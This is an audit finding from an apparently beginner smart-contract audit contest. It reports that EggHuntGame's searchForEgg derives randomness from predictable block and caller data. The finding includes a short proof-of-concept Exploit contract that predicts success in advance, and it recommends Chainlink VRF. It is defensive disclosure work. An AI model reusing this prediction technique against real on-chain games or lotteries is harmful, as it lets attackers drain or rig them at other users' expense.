Eggstravaganza
First Flight #37
Beginner FriendlySolidity
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

`EggHuntGame::searchForEgg` success can be determined before function call

jjhddtt

Summary

The function EggHuntGame::searchForEgg utilizes a pseudo-random number generator that relies on ascertainable data; block.timestamp, block.prevrandao, msg.sender and EggHuntGame::eggCounter - leaving the protocol open to exploitation to guarantee eggs.

Vulnerability Details

To determine whether a Player will find an egg, the EggHuntGame::searchForEgg function implements the following logic:

uint256 random = uint256(
keccak256(abi.encodePacked(block.timestamp, block.prevrandao, msg.sender, eggCounter))
) % 100;

As this information is ascertainable by any Player, they can simply call the function when they are guaranteed success. For example, a contract designed to exploit this vulnerability:

contract Exploit {
EggHuntGame public eggHuntGame;
constructor(address _eggHuntAddress) {
eggHuntGame = EggHuntGame(_eggHuntAddress);
}
function callGetEgg() public view returns (bool) {
uint256 random =
uint256(keccak256(abi.encodePacked(block.timestamp, block.prevrandao, msg.sender, eggHuntGame.eggCounter))) % 100;
console.log("Random number: ", random);
if (random < eggHuntGame.eggFindThreshold()) {
return true;
} else {
return false;
}
}
}

Impact

This vulnerability has a direct impact on the main functionality of the protocol, removing the chance of Player failure.

Tools Used

Manual review.

Recommendations

It is recommended that any randomly generated values are implemented using an oracle service such as Chainlink VRF.

Updates

Lead Judging Commences

m3dython Lead Judge 8 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Insecure Randomness

Insecure methods to generate pseudo-random numbers

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!